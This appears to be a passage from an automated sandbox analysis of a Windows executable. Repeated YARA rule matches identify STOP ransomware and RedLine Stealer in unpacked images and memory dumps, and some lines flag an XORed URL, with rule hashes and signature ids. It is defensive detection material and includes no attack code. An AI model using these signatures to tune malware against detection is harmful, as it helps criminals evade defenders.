      Source: 9.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 12.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 12.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 12.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 12.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 2.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 2.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 14.2.bE5aaTiJM0.exe.42415a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 14.2.bE5aaTiJM0.exe.42415a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 12.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 12.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 2.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 2.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 16.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 16.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 12.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 12.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 9.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 9.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 12.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 12.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 16.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 16.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 12.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 12.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 16.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 16.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 8.2.bE5aaTiJM0.exe.43515a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 8.2.bE5aaTiJM0.exe.43515a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 7.2.bE5aaTiJM0.exe.42915a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 7.2.bE5aaTiJM0.exe.42915a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 16.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 16.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 11.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 11.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 11.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 11.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 0.2.bE5aaTiJM0.exe.42715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 0.2.bE5aaTiJM0.exe.42715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 8.2.bE5aaTiJM0.exe.43515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 8.2.bE5aaTiJM0.exe.43515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 2.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 2.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 9.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 9.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000007.00000002.409352563.00000000027E4000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000010.00000000.440338861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000002.00000000.372461553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 0000000C.00000000.441862325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 0000000C.00000000.441862325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 0000000B.00000000.424465720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 0000000B.00000000.424465720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000009.00000000.402254205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 0000000C.00000000.439811041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000008.00000002.448603101.0000000004350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000010.00000000.444270731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000010.00000000.444270731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 0000000A.00000002.429478962.00000000041D1000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000007.00000002.409983046.0000000004290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000008.00000002.448142800.00000000041B2000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 0000000E.00000002.445958712.00000000041A4000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 0000000B.00000000.421469310.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 0000000B.00000000.421469310.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000009.00000000.403911103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000009.00000000.403911103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000000.00000002.378159844.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000000.00000002.378332147.0000000004270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 0000000A.00000002.431402243.0000000004270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 0000000B.00000000.418527999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
      Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 4004, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 5720, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 5592, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 4376, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 3616, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 5828, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 5832, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 3920, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 3304, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 2888, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
      Source: bE5aaTiJM0.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 11.0.bE5aaTiJM0.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 9.0.bE5aaTiJM0.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 9.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 9.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 9.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 10.2.bE5aaTiJM0.exe.42715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 10.2.bE5aaTiJM0.exe.42715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 10.2.bE5aaTiJM0.exe.42715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 10.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 10.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 10.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 2.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 2.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 2.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 11.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 11.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 11.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 12.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 12.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 12.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 2.0.bE5aaTiJM0.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 12.0.bE5aaTiJM0.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
